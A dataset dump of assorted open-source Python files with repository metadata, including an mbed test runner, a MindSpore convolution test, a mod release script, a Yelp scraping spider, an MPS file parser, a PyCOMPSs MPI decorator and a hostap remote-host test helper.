Dataset schema (column: type, observed range; "nullable" marks columns that may be empty):

hexsha: string (length 40) | size: int64 (4 to 1.02M) | ext: string (8 classes) | lang: string (1 class)
max_stars_repo_path: string (length 4 to 209) | max_stars_repo_name: string (length 5 to 121) | max_stars_repo_head_hexsha: string (length 40) | max_stars_repo_licenses: list (length 1 to 10) | max_stars_count: int64 (1 to 191k, nullable) | max_stars_repo_stars_event_min_datetime / max_stars_repo_stars_event_max_datetime: string (length 24, nullable)
max_issues_repo_path: string (length 4 to 209) | max_issues_repo_name: string (length 5 to 121) | max_issues_repo_head_hexsha: string (length 40) | max_issues_repo_licenses: list (length 1 to 10) | max_issues_count: int64 (1 to 67k, nullable) | max_issues_repo_issues_event_min_datetime / max_issues_repo_issues_event_max_datetime: string (length 24, nullable)
max_forks_repo_path: string (length 4 to 209) | max_forks_repo_name: string (length 5 to 121) | max_forks_repo_head_hexsha: string (length 40) | max_forks_repo_licenses: list (length 1 to 10) | max_forks_count: int64 (1 to 105k, nullable) | max_forks_repo_forks_event_min_datetime / max_forks_repo_forks_event_max_datetime: string (length 24, nullable)
content: string (length 4 to 1.02M) | avg_line_length: float64 (1.07 to 66.1k) | max_line_length: int64 (4 to 266k) | alphanum_fraction: float64 (0.01 to 1)
hexsha: a13d0727996194ada2cfe0e03461ab5e44a4fc8f | size: 4,666 | ext: py | lang: Python
repo: noralsydmp/mbed-os-tools @ 5a14958aa49eb5764afba8e1dc3208cae2955cd7 | path: src/mbed_os_tools/test/host_tests_runner/host_test.py | licenses: ["Apache-2.0"]
stars: 1 (2021-08-10T02:15:18.000Z to 2021-08-10T02:15:18.000Z) | issues: null | forks: 1 (2021-08-10T02:15:18.000Z to 2021-08-10T02:15:18.000Z)
# Copyright (c) 2018, Arm Limited and affiliates.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sys import stdout
from .mbed_base import Mbed
from ... import __version__
class HostTestResults(object):
"""! Test results set by host tests """
def enum(self, **enums):
return type('Enum', (), enums)
def __init__(self):
self.TestResults = self.enum(
RESULT_SUCCESS = 'success',
RESULT_FAILURE = 'failure',
RESULT_ERROR = 'error',
RESULT_END = 'end',
RESULT_UNDEF = 'undefined',
RESULT_TIMEOUT = 'timeout',
RESULT_IOERR_COPY = "ioerr_copy",
RESULT_IOERR_DISK = "ioerr_disk",
RESULT_IO_SERIAL = 'ioerr_serial',
RESULT_NO_IMAGE = 'no_image',
RESULT_NOT_DETECTED = "not_detected",
RESULT_MBED_ASSERT = "mbed_assert",
RESULT_PASSIVE = "passive",
RESULT_BUILD_FAILED = 'build_failed',
RESULT_SYNC_FAILED = 'sync_failed'
)
# Magically creates attributes in this class corresponding
# to RESULT_ elements in self.TestResults enum
for attr in self.TestResults.__dict__:
if attr.startswith('RESULT_'):
setattr(self, attr, self.TestResults.__dict__[attr])
# Indexes of this list define string->int mapping between
# actual strings with results
self.TestResultsList = [
self.TestResults.RESULT_SUCCESS,
self.TestResults.RESULT_FAILURE,
self.TestResults.RESULT_ERROR,
self.TestResults.RESULT_END,
self.TestResults.RESULT_UNDEF,
self.TestResults.RESULT_TIMEOUT,
self.TestResults.RESULT_IOERR_COPY,
self.TestResults.RESULT_IOERR_DISK,
self.TestResults.RESULT_IO_SERIAL,
self.TestResults.RESULT_NO_IMAGE,
self.TestResults.RESULT_NOT_DETECTED,
self.TestResults.RESULT_MBED_ASSERT,
self.TestResults.RESULT_PASSIVE,
self.TestResults.RESULT_BUILD_FAILED,
self.TestResults.RESULT_SYNC_FAILED
]
def get_test_result_int(self, test_result_str):
"""! Maps test result string to unique integer """
if test_result_str in self.TestResultsList:
return self.TestResultsList.index(test_result_str)
return -1
def __getitem__(self, test_result_str):
"""! Returns numerical result code """
return self.get_test_result_int(test_result_str)
class Test(HostTestResults):
""" Base class for host test's test runner
"""
def __init__(self, options):
""" ctor
"""
HostTestResults.__init__(self)
self.mbed = Mbed(options)
def run(self):
""" Test runner for host test. This function will start executing
test and forward test result via serial port to test suite
"""
pass
def setup(self):
"""! Setup and check if configuration for test is correct.
@details This function can for example check if serial port is already opened
"""
pass
def notify(self, msg):
"""! On screen notification function
@param msg Text message sent to stdout directly
"""
stdout.write(msg)
stdout.flush()
def print_result(self, result):
"""! Test result unified printing function
@param result Should be a member of HostTestResults.RESULT_* enums
"""
self.notify("{{%s}}\n"% result)
self.notify("{{%s}}\n"% self.RESULT_END)
def finish(self):
""" dctor for this class, finishes tasks and closes resources
"""
pass
def get_hello_string(self):
""" Hello string used as first print
"""
return "host test executor ver. " + __version__
class DefaultTestSelectorBase(Test):
"""! Test class with serial port initialization
@details This is a base for other test selectors, initializes
"""
def __init__(self, options):
Test.__init__(self, options=options)
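A minimal sketch of how the result mapping above behaves; indexing a HostTestResults instance with a result string returns its position in TestResultsList, or -1 for unknown strings:

results = HostTestResults()
print(results.RESULT_SUCCESS)     # 'success' (attribute created from the enum)
print(results['success'])         # 0, index in TestResultsList
print(results['failure'])         # 1
print(results['not_a_result'])    # -1 for unknown result strings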
avg_line_length: 34.562963 | max_line_length: 85 | alphanum_fraction: 0.63802

hexsha: 2cec372b0353ffee85e5e63a6e8872ad068c78a5 | size: 1,965 | ext: py | lang: Python
repo: doc22940/mindspore @ 21bcdcd8adb97b9171b2822a7ed2c4c138c99607 | path: tests/st/ops/ascend/test_tbe_ops/test_conv.py | licenses: ["Apache-2.0"]
stars: 1 (2020-05-13T11:31:21.000Z to 2020-05-13T11:31:21.000Z) | issues: null | forks: null
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from mindspore import Tensor
from mindspore.ops import operations as P
import mindspore.nn as nn
from mindspore.common.api import ms_function
import numpy as np
import mindspore.context as context
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
out_channel = 64
kernel_size = 7
self.conv = P.Conv2D(out_channel,
kernel_size,
mode=1,
pad_mode="valid",
pad=0,
stride=1,
dilation=1,
group=1)
self.w = Parameter(initializer(
'normal', [64, 3, 7, 7]), name='w')
@ms_function
def construct(self, x):
return self.conv(x, self.w)
def test_net():
x = np.random.randn(32, 3, 224, 224).astype(np.float32)
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
conv = Net()
output = conv(Tensor(x))
print(output.asnumpy())
context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend")
conv = Net()
output = conv(Tensor(x))
print(output.asnumpy())
avg_line_length: 34.473684 | max_line_length: 78 | alphanum_fraction: 0.612723

hexsha: 69c5d87ca7a8d396eff6423a936b7c9f6f309f7c | size: 3,308 | ext: py | lang: Python
repo: stealthz67/spoter-mods-1 @ 4ebd859fbb705b085ae5c4cb621edfbab476e378 | path: mod_marksOnGunExtended/.release.py | licenses: ["WTFPL"]
stars: 1 (2020-02-06T07:13:40.000Z to 2020-02-06T07:13:40.000Z) | issues: null | forks: 1 (2019-12-10T19:11:55.000Z to 2019-12-10T19:11:55.000Z)
# -*- coding: utf-8 -*-
import glob
import os
import shutil
import subprocess
import _build as build
ZIP = 'mods_marksOnGunExtended.zip'
class Release(object):
def __init__(self, build, zip):
self.data = build
self.zipPath = os.path.join('zip', zip)
self.modsPath = os.path.join(self.data.build.OUT_PATH, 'mods')
self.versionPath = os.path.join(self.modsPath, self.data.CLIENT_VERSION, 'spoter')
self.configPath = os.path.join(self.modsPath, 'configs', 'spoter', os.path.splitext(os.path.basename(self.data.build.VERSION["config"]))[0])
self.i18n = os.path.join(self.configPath, 'i18n')
self.clearZip()
self.packZip()
self.clear()
def packZip(self):
subprocess.check_call(['powershell', 'mkdir', self.versionPath])
subprocess.check_call(['powershell', 'mkdir', self.i18n])
#copy *.wotmod
subprocess.call('powershell robocopy %s %s %s /COPYALL' % (os.path.realpath('release'), os.path.realpath(self.versionPath), self.data.build.RELEASE))
#copy config
subprocess.call('powershell robocopy %s %s %s /COPYALL' % (os.path.realpath(os.path.join(self.data.build.BUILD_PATH, os.path.dirname(self.data.build.VERSION["config"]))), os.path.realpath(self.configPath), os.path.basename(self.data.build.VERSION["config"])))
#copy i18n files
for path in glob.glob(os.path.join(self.data.build.BUILD_PATH, self.data.build.VERSION["i18n"], "*.json")):
subprocess.call('powershell robocopy %s %s %s /COPYALL' % (os.path.join(self.data.build.BUILD_PATH, self.data.build.VERSION["i18n"]), os.path.realpath(self.i18n), os.path.basename(path)))
#copy mod_mods_gui core
if os.path.exists('../../spoter-mods/mod_mods_gui/release'):
subprocess.call('powershell robocopy %s %s %s /COPYALL' %(os.path.realpath('../../spoter-mods/mod_mods_gui/release'), os.path.join(self.modsPath, self.data.CLIENT_VERSION), '*.wotmod') )
if os.path.exists('../../spoter-mods/mod_mods_gui//release/i18n'):
subprocess.call('powershell robocopy %s %s %s /COPYALL' %(os.path.realpath('../../spoter-mods/mod_mods_gui/release/i18n'), os.path.join(self.modsPath, 'configs', 'mods_gui', 'i18n'), '*.json') )
ps = '%s\%s' % (os.path.realpath(self.data.build.OUT_PATH), 'create-7zip.ps1')
with open(ps, 'w') as xfile:
xfile.write('function create-7zip([String] $aDirectory, [String] $aZipfile){ [string]$pathToZipExe = "C:\Program Files\\7-zip\\7z.exe"; [Array]$arguments = "a", "-tzip", "-ssw", "-mx9", "$aZipfile", "$aDirectory"; & $pathToZipExe $arguments; }\n'
'create-7zip "%s" "%s"\n' % (os.path.realpath(self.modsPath), os.path.realpath(self.zipPath)))
xfile.close()
subprocess.call('powershell -executionpolicy bypass -command "& {Set-ExecutionPolicy AllSigned; %s; Set-ExecutionPolicy Undefined}"' % ps)
def clearZip(self):
try:
shutil.rmtree('zip', True)
except OSError:
pass
def clear(self):
try:
shutil.rmtree(self.data.build.OUT_PATH, True)
except OSError:
pass
try:
shutil.rmtree('release', True)
except OSError:
pass
Release(build, ZIP)
avg_line_length: 53.354839 | max_line_length: 267 | alphanum_fraction: 0.637848

hexsha: c1c83f623a7a0f10a42adcfbf6caf822719fe0f2 | size: 953 | ext: py | lang: Python
repo: zeromtmu/practicaldatascience.github.io @ 62950a3a3e7833552b0f2269cc3ee5c34a1d6d7b | path: 2016/tutorial_final/35/demo/demo/spiders/YelpSpider.py | licenses: ["MIT"]
stars: 1 (2021-07-06T17:36:24.000Z to 2021-07-06T17:36:24.000Z) | issues: null | forks: 1 (2021-07-06T17:36:34.000Z to 2021-07-06T17:36:34.000Z)
import scrapy
class YelpSpider(scrapy.Spider):
name = "yelpspider"
start_urls = [
'https://www.yelp.com/search?find_desc=Restaurants&find_loc=Pittsburgh,+PA&start=0',
]
def parse(self, response):
for r in response.css('ul.ylist.ylist-bordered.search-results'):
yield {
'restaurant_name': r.css('span.indexed-biz-name a.biz-name.js-analytics-click span::text').extract(),
'review': [float(x.split(' ')[0]) for x in r.css('div.rating-large i.star-img::attr(title)').extract()],
'review_counts': [int(x.strip().split(' ')[0]) for x in r.css('span.review-count::text').extract()],
}
next_page = response.css('a.u-decoration-none.next.pagination-links_anchor::attr(href)').extract_first()
if next_page is not None:
next_page = response.urljoin(next_page)
yield scrapy.Request(next_page, callback=self.parse)
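A small sketch of running the spider above programmatically, assuming Scrapy's CrawlerProcess API; the feed file name is hypothetical:

from scrapy.crawler import CrawlerProcess

process = CrawlerProcess(settings={
    "FEEDS": {"yelp_results.json": {"format": "json"}},  # hypothetical output path
})
process.crawl(YelpSpider)
process.start()  # blocks until the crawl finishes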
avg_line_length: 47.65 | max_line_length: 120 | alphanum_fraction: 0.620147

hexsha: 63ba872da92e41a3e798430624650a960aa80415 | size: 246 | ext: py | lang: Python
repo: AnufriyevT/RestApiBlog @ bb80068da371ae578ab1863ea792341e428f1034 | path: posts/urls.py | licenses: ["MIT"]
stars: null | issues: null | forks: null
from rest_framework import routers
from posts.views import NetworkViewSet, UserViewSet
router = routers.SimpleRouter()
router.register(r'posts', NetworkViewSet)
router.register(r'users', UserViewSet)
urlpatterns = []
urlpatterns += router.urls
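A short sketch of how these router-generated routes would typically be mounted in the project URLConf; the 'api/' prefix is an assumption:

from django.urls import include, path

urlpatterns = [
    path('api/', include('posts.urls')),  # exposes /api/posts/ and /api/users/
]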
avg_line_length: 24.6 | max_line_length: 51 | alphanum_fraction: 0.804878

hexsha: 3944ae7f91de2450e0e926f00ae58111c27c7983 | size: 9,792 | ext: py | lang: Python
repo: bodono/pysmps @ 1141f772650914bae6ab0dc564e61667a8dcf5c4 | path: pysmps/smps_loader.py | licenses: ["MIT"]
stars: null | issues: null | forks: null
# -*- coding: utf-8 -*-
"""Created on Sun Sep 8 13:28:53 2019.
@author: Julian Märte
Updated by: Brendan O'Dongohue, bodonoghue85@gmail.com, Oct 14th 2020
"""
import re
import numpy as np
import scipy.sparse
CORE_FILE_ROW_MODE = 'ROWS'
CORE_FILE_COL_MODE = 'COLUMNS'
CORE_FILE_RHS_MODE = 'RHS'
CORE_FILE_BOUNDS_MODE = 'BOUNDS'
CORE_FILE_BOUNDS_MODE_NAME_GIVEN = 'BOUNDS_NAME'
CORE_FILE_BOUNDS_MODE_NO_NAME = 'BOUNDS_NO_NAME'
CORE_FILE_RHS_MODE_NAME_GIVEN = 'RHS_NAME'
CORE_FILE_RHS_MODE_NO_NAME = 'RHS_NO_NAME'
ROW_MODE_OBJ = 'N'
def load_mps(path):
mode = ''
name = None
objective_name = None
row_names = []
types = []
col_names = []
col_types = []
A = scipy.sparse.dok_matrix((0, 0), dtype=np.float64)
c = np.array([])
rhs_names = []
rhs = {}
bnd_names = []
bnd = {}
integral_marker = False
with open(path, 'r') as reader:
for line in reader:
line = re.split(' |\t', line)
line = [x.strip() for x in line]
line = list(filter(None, line))
if line[0] == 'ENDATA':
break
if line[0] == '*':
continue
if line[0] == 'NAME':
name = line[1]
elif line[0] in [CORE_FILE_ROW_MODE, CORE_FILE_COL_MODE]:
mode = line[0]
elif line[0] == CORE_FILE_RHS_MODE and len(line) <= 2:
if len(line) > 1:
rhs_names.append(line[1])
rhs[line[1]] = np.zeros(len(row_names))
mode = CORE_FILE_RHS_MODE_NAME_GIVEN
else:
mode = CORE_FILE_RHS_MODE_NO_NAME
elif line[0] == CORE_FILE_BOUNDS_MODE and len(line) <= 2:
if len(line) > 1:
bnd_names.append(line[1])
bnd[line[1]] = {'LO': np.zeros(
len(col_names)), 'UP': np.repeat(np.inf, len(col_names))}
mode = CORE_FILE_BOUNDS_MODE_NAME_GIVEN
else:
mode = CORE_FILE_BOUNDS_MODE_NO_NAME
elif mode == CORE_FILE_ROW_MODE:
if line[0] == ROW_MODE_OBJ:
objective_name = line[1]
else:
types.append(line[0])
row_names.append(line[1])
elif mode == CORE_FILE_COL_MODE:
if len(line) > 1 and line[1] == "'MARKER'":
if line[2] == "'INTORG'":
integral_marker = True
elif line[2] == "'INTEND'":
integral_marker = False
continue
try:
i = col_names.index(line[0])
except:
if A.shape[1] == 0:
A = scipy.sparse.dok_matrix(
(len(row_names), 1), dtype=np.float64)
else:
new_col = scipy.sparse.dok_matrix(
(len(row_names), 1), dtype=np.float64)
A = scipy.sparse.hstack((A, new_col), format='dok')
col_names.append(line[0])
col_types.append(integral_marker * 'integral' +
(not integral_marker) * 'continuous')
c = np.append(c, 0)
i = -1
j = 1
while j < len(line) - 1:
if line[j] == objective_name:
c[i] = float(line[j + 1])
else:
A[row_names.index(line[j]), i] = float(line[j + 1])
j = j + 2
elif mode == CORE_FILE_RHS_MODE_NAME_GIVEN:
if line[0] != rhs_names[-1]:
raise Exception(
'Other RHS name was given even though name was set after RHS tag.')
for kk in range((len(line) - 1) // 2):
idx = kk * 2
try:
rhs[line[0]][row_names.index(
line[idx+1])] = float(line[idx+2])
except Exception as e:
if objective_name == line[idx+1]:
print("MPS read warning: objective appearing in RHS, ignoring")
else:
raise e
elif mode == CORE_FILE_RHS_MODE_NO_NAME:
if len(line) % 2 == 1: # odd: RHS named
try:
i = rhs_names.index(line[0])
except:
rhs_names.append(line[0])
rhs[line[0]] = np.zeros(len(row_names))
i = -1
for kk in range((len(line) - 1) // 2):
idx = kk * 2
try:
rhs[line[0]][row_names.index(
line[idx+1])] = float(line[idx+2])
except Exception as e:
if objective_name == line[idx+1]:
print("MPS read warning: objective appearing in RHS, ignoring")
else:
raise e
else: # even, no RHS name
try:
i = rhs_names.index("TEMP")
except:
rhs_names.append("TEMP")
rhs["TEMP"] = np.zeros(len(row_names))
i = -1
for kk in range(len(line) // 2):
idx = kk * 2
try:
rhs["TEMP"][row_names.index(
line[idx])] = float(line[idx+1])
except Exception as e:
if objective_name == line[idx]:
print("MPS read warning: objective appearing in RHS, ignoring")
else:
raise e
elif mode == CORE_FILE_BOUNDS_MODE_NAME_GIVEN:
if line[1] != bnd_names[-1]:
raise Exception(
'Other BOUNDS name was given even though name was set after BOUNDS tag.')
if line[0] in ['LO', 'UP']:
bnd[line[1]][line[0]][col_names.index(
line[2])] = float(line[3])
elif line[0] == 'FX':
bnd[line[1]]['LO'][col_names.index(
line[2])] = float(line[3])
bnd[line[1]]['UP'][col_names.index(
line[2])] = float(line[3])
elif line[0] == 'PL': # free positive (aka default)
bnd[line[1]]['LO'][col_names.index(line[2])] = 0
elif line[0] == 'FR': # free
bnd[line[1]]['LO'][col_names.index(line[2])] = -np.inf
elif line[0] == 'BV': # binary value
bnd[line[1]]['LO'][col_names.index(
line[2])] = 0.
bnd[line[1]]['UP'][col_names.index(
line[2])] = 1.
elif mode == CORE_FILE_BOUNDS_MODE_NO_NAME:
_bnds = ['FR', 'BV', 'PL']
if (len(line) % 2 == 0 and line[0] not in _bnds) or (len(line) % 2 == 1 and line[0] in _bnds): # even, bound has name
try:
i = bnd_names.index(line[1])
except:
bnd_names.append(line[1])
bnd[line[1]] = {'LO': np.zeros(
len(col_names)), 'UP': np.repeat(np.inf, len(col_names))}
i = -1
if line[0] in ['LO', 'UP']:
bnd[line[1]][line[0]][col_names.index(
line[2])] = float(line[3])
elif line[0] == 'FX': # fixed
bnd[line[1]]['LO'][col_names.index(
line[2])] = float(line[3])
bnd[line[1]]['UP'][col_names.index(
line[2])] = float(line[3])
elif line[0] == 'PL': # free positive (aka default)
bnd[line[1]]['LO'][col_names.index(line[2])] = 0
elif line[0] == 'FR': # free
bnd[line[1]]['LO'][col_names.index(line[2])] = -np.inf
elif line[0] == 'BV': # binary value
bnd[line[1]]['LO'][col_names.index(
line[2])] = 0.
bnd[line[1]]['UP'][col_names.index(
line[2])] = 1.
else: # odd, bound has no name
try:
i = bnd_names.index("TEMP_BOUND")
except:
bnd_names.append("TEMP_BOUND")
bnd["TEMP_BOUND"] = {'LO': np.zeros(
len(col_names)), 'UP': np.repeat(np.inf, len(col_names))}
i = -1
if line[0] in ['LO', 'UP']:
bnd["TEMP_BOUND"][line[0]][col_names.index(
line[1])] = float(line[2])
elif line[0] == 'FX':
bnd["TEMP_BOUND"]['LO'][col_names.index(
line[1])] = float(line[2])
bnd["TEMP_BOUND"]['UP'][col_names.index(
line[1])] = float(line[2])
elif line[0] == 'FR':
bnd["TEMP_BOUND"]['LO'][col_names.index(line[1])] = -np.inf
return dict(name=name, objective_name=objective_name, row_names=row_names,
col_names=col_names, col_types=col_types, types=types, c=c, A=A,
rhs_names=rhs_names, rhs=rhs, bnd_names=bnd_names, bnd=bnd)
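A minimal usage sketch for load_mps above; the file path is hypothetical and the printed fields come straight from the returned dict:

problem = load_mps("problems/example.mps")       # hypothetical MPS file
print(problem["name"], problem["objective_name"])
print("A shape:", problem["A"].shape)            # sparse constraint matrix
print("c length:", len(problem["c"]))            # objective coefficients
print("row types:", problem["types"][:5])        # 'E', 'L', 'G' constraint senses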
avg_line_length: 43.136564 | max_line_length: 131 | alphanum_fraction: 0.425143

hexsha: 78126cf0df2ef751bfee1e98554220844b0b4f10 | size: 8,744 | ext: py | lang: Python
repo: BSC-computational-genomics/compss @ 9cfc9f7b9bdab9dcb0bec083007452cda185f50c | path: compss/programming_model/bindings/python/src/pycompss/api/mpi.py | licenses: ["Apache-2.0"]
stars: null | issues: null | forks: null
#!/usr/bin/python
#
# Copyright 2002-2019 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
PyCOMPSs API - MPI
==================
This file contains the class mpi, needed for the mpi
definition through the decorator.
"""
import inspect
import logging
import os
from functools import wraps
import pycompss.util.context as context
from pycompss.util.arguments import check_arguments
if __debug__:
logger = logging.getLogger(__name__)
MANDATORY_ARGUMENTS = {'binary',
'runner'}
SUPPORTED_ARGUMENTS = {'computing_nodes',
'working_dir',
'binary',
'runner'}
DEPRECATED_ARGUMENTS = {'computingNodes',
'workingDir'}
class Mpi(object):
"""
This decorator also preserves the argspec, but includes the __init__ and
__call__ methods, useful on mpi task creation.
"""
def __init__(self, *args, **kwargs):
"""
Store arguments passed to the decorator
# self = itself.
# args = not used.
# kwargs = dictionary with the given mpi parameters
:param args: Arguments
:param kwargs: Keyword arguments
"""
self.args = args
self.kwargs = kwargs
self.registered = False
self.scope = context.in_pycompss()
if self.scope:
if __debug__:
logger.debug("Init @mpi decorator...")
# Check the arguments
check_arguments(MANDATORY_ARGUMENTS,
DEPRECATED_ARGUMENTS,
SUPPORTED_ARGUMENTS | DEPRECATED_ARGUMENTS,
list(kwargs.keys()),
"@mpi")
# Get the computing nodes: This parameter will have to go down until
# execution when invoked.
if 'computing_nodes' not in self.kwargs and 'computingNodes' not in self.kwargs:
self.kwargs['computing_nodes'] = 1
else:
if 'computingNodes' in self.kwargs:
self.kwargs['computing_nodes'] = self.kwargs.pop('computingNodes')
computing_nodes = self.kwargs['computing_nodes']
if isinstance(computing_nodes, int):
# Nothing to do
pass
elif isinstance(computing_nodes, str):
# Check if it is an environment variable to be loaded
if computing_nodes.strip().startswith('$'):
# Computing nodes is an ENV variable, load it
env_var = computing_nodes.strip()[1:] # Remove $
if env_var.startswith('{'):
env_var = env_var[1:-1] # remove brackets
try:
self.kwargs['computing_nodes'] = int(os.environ[env_var])
except ValueError:
raise Exception("ERROR: ComputingNodes value cannot be cast from ENV variable to int")
else:
# ComputingNodes is in string form, cast it
try:
self.kwargs['computing_nodes'] = int(computing_nodes)
except ValueError:
raise Exception("ERROR: ComputingNodes value cannot be cast from string to int")
else:
raise Exception("ERROR: Wrong Computing Nodes value at MultiNode decorator.")
if __debug__:
logger.debug("This MPI task will have " + str(self.kwargs['computing_nodes']) + " computing nodes.")
else:
pass
def __call__(self, func):
"""
Parse and set the mpi parameters within the task core element.
:param func: Function to decorate
:return: Decorated function.
"""
@wraps(func)
def mpi_f(*args, **kwargs):
if not self.scope:
# from pycompss.api.dummy.mpi import mpi as dummy_mpi
# d_m = dummy_mpi(self.args, self.kwargs)
# return d_m.__call__(func)
raise Exception("The mpi decorator only works within PyCOMPSs framework.")
if context.in_master():
# master code
mod = inspect.getmodule(func)
self.module = mod.__name__ # not func.__module__
if (self.module == '__main__' or
self.module == 'pycompss.runtime.launch'):
# The module where the function is defined was run as __main__,
# we need to find out the real module name.
# path=mod.__file__
# dirs=mod.__file__.split(os.sep)
# file_name=os.path.splitext(os.path.basename(mod.__file__))[0]
# Get the real module name from our launch.py variable
path = getattr(mod, "app_path")
dirs = path.split(os.path.sep)
file_name = os.path.splitext(os.path.basename(path))[0]
mod_name = file_name
i = len(dirs) - 1
while i > 0:
new_l = len(path) - (len(dirs[i]) + 1)
path = path[0:new_l]
if "__init__.py" in os.listdir(path):
# directory is a package
i -= 1
mod_name = dirs[i] + '.' + mod_name
else:
break
self.module = mod_name
# Include the registering info related to @mpi
# Retrieve the base core_element established at @task decorator
from pycompss.api.task import current_core_element as core_element
if not self.registered:
self.registered = True
# Update the core element information with the mpi information
core_element.set_impl_type("MPI")
binary = self.kwargs['binary']
if 'working_dir' in self.kwargs:
working_dir = self.kwargs['working_dir']
else:
working_dir = '[unassigned]' # Empty or '[unassigned]'
runner = self.kwargs['runner']
impl_signature = 'MPI.' + binary
core_element.set_impl_signature(impl_signature)
impl_args = [binary, working_dir, runner]
core_element.set_impl_type_args(impl_args)
else:
# worker code
pass
# This is executed only when called.
if __debug__:
logger.debug("Executing mpi_f wrapper.")
# Set the computing_nodes variable in kwargs for its usage
# in @task decorator
kwargs['computing_nodes'] = self.kwargs['computing_nodes']
if len(args) > 0:
# The 'self' for a method function is passed as args[0]
slf = args[0]
# Replace and store the attributes
saved = {}
for k, v in self.kwargs.items():
if hasattr(slf, k):
saved[k] = getattr(slf, k)
setattr(slf, k, v)
# Call the method
import pycompss.api.task as t
t.prepend_strings = False
ret = func(*args, **kwargs)
t.prepend_strings = True
if len(args) > 0:
# Put things back
for k, v in saved.items():
setattr(slf, k, v)
return ret
mpi_f.__doc__ = func.__doc__
return mpi_f
# ############################################################################# #
# ###################### MPI DECORATOR ALTERNATIVE NAME ####################### #
# ############################################################################# #
mpi = Mpi
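A sketch of how this decorator is typically stacked above @task in PyCOMPSs user code; the binary, runner and parameter names below are assumptions:

from pycompss.api.task import task
from pycompss.api.mpi import mpi
from pycompss.api.parameter import FILE_IN

@mpi(binary="my_mpi_app", runner="mpirun", computing_nodes=2)   # hypothetical binary
@task(input_file=FILE_IN)
def run_simulation(input_file):
    pass  # the body is replaced by the MPI binary invocation at runtime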
avg_line_length: 38.690265 | max_line_length: 116 | alphanum_fraction: 0.51178

hexsha: 0b5f4317381da726bc01415fcb6d396051698f01 | size: 841 | ext: py | lang: Python
repo: aroig/nnutil @ 88df41ee89f592a28c1661ee8837dd8e8ca42cf3 | path: setup.py | licenses: ["BSD-3-Clause"]
stars: null | issues: null | forks: null
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# nnutil - Neural network utilities for tensorflow
# Copyright (c) 2018, Abdó Roig-Maranges <abdo.roig@gmail.com>
#
# This file is part of 'nnutil'.
#
# This file may be modified and distributed under the terms of the 3-clause BSD
# license. See the LICENSE file for details.
from setuptools import setup, find_packages
from nnutil import __version__
setup(
name = 'nnutil',
version = __version__,
license = 'BSD',
description = 'Neural network utilities for tensorflow',
author = 'Abdó Roig-Maranges',
author_email = 'abdo.roig@gmail.com',
packages = find_packages(),
install_requires = [
'Click',
],
entry_points = '''
[console_scripts]
nnutil=nnutil.cli:main
''',
)
avg_line_length: 26.28125 | max_line_length: 79 | alphanum_fraction: 0.621879

hexsha: aa83c1d94abeb3db657dbfb29e48b5a7ef2ce9d0 | size: 3,342 | ext: py | lang: Python
repo: rainlake/hostap @ b9cd4f5e75dc4a7aa3b547925cfb871b6aa103f7 | path: tests/hwsim/remotehost.py | licenses: ["Unlicense"]
stars: null | issues: null | forks: 1 (2022-03-25T08:21:36.000Z to 2022-03-25T08:21:36.000Z)
# Host class
# Copyright (c) 2016, Qualcomm Atheros, Inc.
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
import subprocess
import threading
logger = logging.getLogger()
def remote_compatible(func):
func.remote_compatible = True
return func
def execute_thread(command, reply):
cmd = ' '.join(command)
logger.debug("thread run: " + cmd)
try:
status = 0
buf = subprocess.check_output(command, stderr=subprocess.STDOUT).decode()
except subprocess.CalledProcessError as e:
status = e.returncode
buf = e.output
logger.debug("thread cmd: " + cmd)
logger.debug("thread exit status: " + str(status))
logger.debug("thread exit buf: " + str(buf))
reply.append(status)
reply.append(buf)
class Host():
def __init__(self, host=None, ifname=None, port=None, name="", user="root"):
self.host = host
self.name = name
self.user = user
self.monitors = []
self.monitor_thread = None
self.logs = []
self.ifname = ifname
self.port = port
self.dev = None
if self.name == "" and host != None:
self.name = host
def local_execute(self, command):
logger.debug("execute: " + str(command))
try:
status = 0
buf = subprocess.check_output(command, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
status = e.returncode
buf = e.output
logger.debug("status: " + str(status))
logger.debug("buf: " + str(buf))
return status, buf.decode()
def execute(self, command):
if self.host is None:
return self.local_execute(command)
cmd = ["ssh", self.user + "@" + self.host, ' '.join(command)]
_cmd = self.name + " execute: " + ' '.join(cmd)
logger.debug(_cmd)
try:
status = 0
buf = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
status = e.returncode
buf = e.output
logger.debug(self.name + " status: " + str(status))
logger.debug(self.name + " buf: " + str(buf))
return status, buf.decode()
# async execute
def execute_run(self, command, res):
if self.host is None:
cmd = command
else:
cmd = ["ssh", self.user + "@" + self.host, ' '.join(command)]
_cmd = self.name + " execute_run: " + ' '.join(cmd)
logger.debug(_cmd)
t = threading.Thread(target = execute_thread, args=(cmd, res))
t.start()
return t
def wait_execute_complete(self, t, wait=None):
if wait == None:
wait_str = "infinite"
else:
wait_str = str(wait) + "s"
logger.debug(self.name + " wait_execute_complete(" + wait_str + "): ")
        if t.is_alive():
t.join(wait)
